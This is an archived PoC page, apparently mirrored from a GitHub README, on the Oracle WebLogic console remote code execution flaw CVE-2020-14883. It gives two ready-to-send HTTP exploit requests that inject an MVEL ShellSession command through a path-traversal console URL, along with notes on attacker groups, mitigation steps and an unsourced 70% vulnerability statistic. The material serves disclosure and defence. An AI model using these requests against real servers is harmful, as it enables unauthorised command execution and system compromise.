关联漏洞
标题:Oracle WebLogic Server 安全漏洞 (CVE-2020-14883)Description:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server Console 存在安全漏洞。以下产品及版本受到影响:10.3.6.0.0版本, 12.1.3.0.0版本, 12.2.1.3.0版本, 12.2.1.4.0版本, 14.1.1.0.0版本。
Description
CVE-2020-14883
介绍
# 🌐 **CVE-2020-14883** — *Oracle WebLogic Server RCE*
> **Published:** October 20, 2020
> **CVSS v3.1:** `7.2` **(High)**
> **Exploitability:** Easy (with auth) — *Critical when chained*
---
## 🎯 **Vulnerability Overview**
| Attribute | Details |
|--------|---------|
| **Type** | Remote Code Execution (RCE) |
| **Component** | WebLogic Server Console |
| **Attack Vector** | Network (HTTP) |
| **Authentication** | Required *(High Privilege)* |
| **User Interaction** | None |
| **Exploit Code** | Publicly Available |
> **Chained Exploit**:
> `CVE-2020-14882` (Auth Bypass) + `CVE-2020-14883` = **Unauthenticated RCE**
<img width="1920" height="955" alt="CVE-2020-14883" src="https://github.com/user-attachments/assets/a167aeb7-164f-4d15-80cf-a3499b61059d" />
---
## 🔥 **Exploitation Flow**
```http
POST /console/css/%2e%2e%2fconsole.portal HTTP/1.1
Content-Type: application/x-www-form-urlencoded
com.tangosol.coherence.mvel2.sh.ShellSession=java.lang.Runtime.getRuntime().exec("touch /tmp/pwned.txt")
```
Proof of Concept (PoC) 1: using `tangosol.coherence.mvel2.sh.ShellSession()` for Windows-based targets
```python
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
```
> **Result**: Arbitrary command execution on the server.
---
## 🛑 **In the Wild**
| Threat Actor | Payload |
|--------------|--------|
| **8220 Gang** | Coinminers, Infostealers |
| **Cryptojackers** | XMRig, rhajk, nasqa |
| **APT Groups** | Persistence & Lateral Movement |
---
## 🛡️ **Mitigation Checklist**
| Action | Status |
|-------|--------|
| Apply **Oracle October 2020 CPU** | ✅ Critical |
| Restrict `/console` to trusted IPs | ✅ |
| Disable Console if not needed | ✅ |
| Monitor for `/console.portal` anomalies | ✅ |
| Use IPS/IDS signatures | ✅ |
> **Patch Download**: [My Oracle Support](https://support.oracle.com) (Login Required)
---
## 🎨 **Visual Summary**
```mermaid
pie title Exploitation Risk
"Patched" : 30
"Unpatched & Exposed" : 70
```
> **70% of scanned WebLogic instances remain vulnerable in 2025.**
---
**Final Note**:
> This is a **high-value target** for attackers.
> **Patch now. Monitor always.**
---
```mermaid
%%{init: {'theme': 'base', 'themeVariables': { 'fontSize': '13px', 'fontFamily': 'Fira Code, monospace', 'primaryColor': '#ff4d4f', 'primaryTextColor': '#fff', 'primaryBorderColor': '#ff7875', 'lineColor': '#ffccc7', 'secondaryColor': '#ffd591', 'tertiaryColor': '#91d9ff', 'background': '#fafafa' }}}%%
erDiagram
CVE_2020_14883 }|..|{ CVE_2020_14882 : "enables unauthenticated access"
CVE_2020_14883 }|..|{ WEBLOGIC_CONSOLE : "targets"
WEBLOGIC_CONSOLE }|..|{ MVEL_PAYLOAD : "executes via"
MVEL_PAYLOAD }|..|{ SHELL_SESSION : "uses class"
SHELL_SESSION }|..|{ JAVA_RUNTIME : "invokes"
JAVA_RUNTIME }|..|{ OS_COMMAND : "executes"
CVE_2020_14883 {
string id "CVE-2020-14883"
string type "Remote Code Execution"
string cvss "7.2"
string severity "HIGH"
string published "2020-10-20"
string vector "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
CVE_2020_14882 {
string id "CVE-2020-14882"
string type "Authentication Bypass"
string cvss "9.8"
string severity "CRITICAL"
}
WEBLOGIC_CONSOLE {
string component "Console"
string endpoint "/console/css/%2e%2e%2fconsole.portal"
string method "POST"
string parameter "com.tangosol.coherence.mvel2.sh.ShellSession"
}
MVEL_PAYLOAD {
string language "MVEL2"
string example "java.lang.Runtime.getRuntime().exec('id')"
string injection_point "ShellSession parameter"
}
SHELL_SESSION {
string class "com.tangosol.coherence.mvel2.sh.ShellSession"
string gadget "Coherence Deserialization"
}
JAVA_RUNTIME {
string method "getRuntime().exec()"
string privilege_level "WebLogic process user"
}
OS_COMMAND {
string scope "Arbitrary OS commands"
string impact "Full system compromise"
}
%% Styling
classDef cve fill:#ff4d4f,stroke:#ff7875,color:#fff
classDef component fill:#ffd591,stroke:#ffc069,color:#000
classDef exploit fill:#91d9ff,stroke:#40a9ff,color:#000
classDef system fill:#d3f261,stroke:#a0d911,color:#000
class CVE_2020_14883,CVE_2020_14882 cve
class WEBLOGIC_CONSOLE,MVEL_PAYLOAD component
class SHELL_SESSION,JAVA_RUNTIME exploit
class OS_COMMAND system
```
---
文件快照
[4.0K] /data/pocs/9fe4d9c34c60d802883c348bbc344843f14721e3
└── [5.0K] README.md
1 directory, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。